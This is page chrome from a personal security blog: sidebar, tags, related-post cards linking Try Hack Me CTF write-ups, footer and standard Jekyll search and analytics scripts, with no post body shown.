title="Linkedin" target="_blank" rel="noopener" aria-label="Linkedin"> <i class="fa-fw fab fa-linkedin"></i> </a> <i class="fa-fw fas fa-link small" onclick="copyLink('', 'Link copied successfully!')" data-toggle="tooltip" data-placement="top" title="Copy link"> </i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down"><div class="access"><div id="access-lastmod" class="post"> <span>Recent Update</span><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/configure-raspberry-pi-from-scratch/">Configure a Raspberry Pi from scratch</a><li><a href="/posts/pbs-rpi/">Proxmox Backup Server on Raspberry Pi</a><li><a href="/posts/thm-basic-pentesting/">Basic Pentesting (Try Hack Me)</a><li><a href="/posts/thm-gamezone/">Gamezone (Try Hack Me)</a><li><a href="/posts/thm-overpass/">Overpass (Try Hack Me)</a></ul></div><div id="access-tags"> <span>Trending Tags</span><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/writeup/">writeup</a> <a class="post-tag" href="/tags/ctf/">ctf</a> <a class="post-tag" href="/tags/thm/">thm</a> <a class="post-tag" href="/tags/privesc/">privesc</a> <a class="post-tag" href="/tags/web-application/">web application</a> <a class="post-tag" href="/tags/ejpt/">eJPT</a> <a class="post-tag" href="/tags/ftp/">ftp</a> <a class="post-tag" href="/tags/reverse-shell/">reverse shell</a> <a class="post-tag" href="/tags/brute-force/">brute force</a> <a class="post-tag" href="/tags/ine/">INE</a></div></div></div><script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script><div id="toc-wrapper" class="pl-0 pr-4 mb-5"> <span class="pl-3 pt-2 mb-2">Contents</span><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="post-extend-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/thm-basic-pentesting/"><div class="card-body"> <span class="timeago small" >Sep 17, 2021<i class="unloaded">2021-09-17T18:00:00-04:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Basic Pentesting (Try Hack Me)</h3><div class="text-muted small"><p> I am currently in the process of completing these boxes on Try Hack Me again in an effort to document my experience, reinforce my knowledge of the topics, and improve my ability to concisely commun...</p></div></div></a></div><div class="card"> <a href="/posts/thm-gamezone/"><div class="card-body"> <span class="timeago small" >Sep 19, 2021<i class="unloaded">2021-09-19T00:10:00-04:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Gamezone (Try Hack Me)</h3><div class="text-muted small"><p> I am currently in the process of completing these boxes on Try Hack Me again in an effort to document my experience, reinforce my knowledge of the topics, and improve my ability to concisely commun...</p></div></div></a></div><div class="card"> <a href="/posts/thm-overpass/"><div class="card-body"> <span class="timeago small" >Sep 19, 2021<i class="unloaded">2021-09-19T11:15:00-04:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Overpass (Try Hack Me)</h3><div class="text-muted small"><p> I am currently in the process of completing these boxes on Try Hack Me again in an effort to document my experience, reinforce my knowledge of the topics, and improve my ability to concisely commun...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/posts/thm-b99/" class="btn btn-outline-primary" prompt="Older"><p>Brooklyn Nine Nine (Try Hack Me)</p></a> <a href="/posts/thm-toolsrus/" class="btn btn-outline-primary" prompt="Newer"><p>Tools R Us (Try Hack Me)</p></a></div></div></div></div><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="footer-left"><p class="mb-0"> © 2023 <a href="https://github.com/robgoyal">Robin Goyal</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"></p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-sm-11 post-content"><div id="search-hints"><h4 class="text-muted mb-4">Trending Tags</h4><a class="post-tag" href="/tags/writeup/">writeup</a> <a class="post-tag" href="/tags/ctf/">ctf</a> <a class="post-tag" href="/tags/thm/">thm</a> <a class="post-tag" href="/tags/privesc/">privesc</a> <a class="post-tag" href="/tags/web-application/">web application</a> <a class="post-tag" href="/tags/ejpt/">eJPT</a> <a class="post-tag" href="/tags/ftp/">ftp</a> <a class="post-tag" href="/tags/reverse-shell/">reverse shell</a> <a class="post-tag" href="/tags/brute-force/">brute force</a> <a class="post-tag" href="/tags/ine/">INE</a></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="https://robgoyal.github.io{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script> <script src="https://cdn.jsdelivr.net/combine/npm/lozad/dist/lozad.min.js,npm/magnific-popup@1/dist/jquery.magnific-popup.min.js"></script> <script defer src="/assets/js/dist/post.min.js"></script> <script src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.16.1,npm/bootstrap@4/dist/js/bootstrap.min.js"></script> <script defer src="/app.js"></script> <script defer src="https://www.googletagmanager.com/gtag/js?id="></script> <script> document.addEventListener("DOMContentLoaded", function(event) { window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', ''); }); </script>
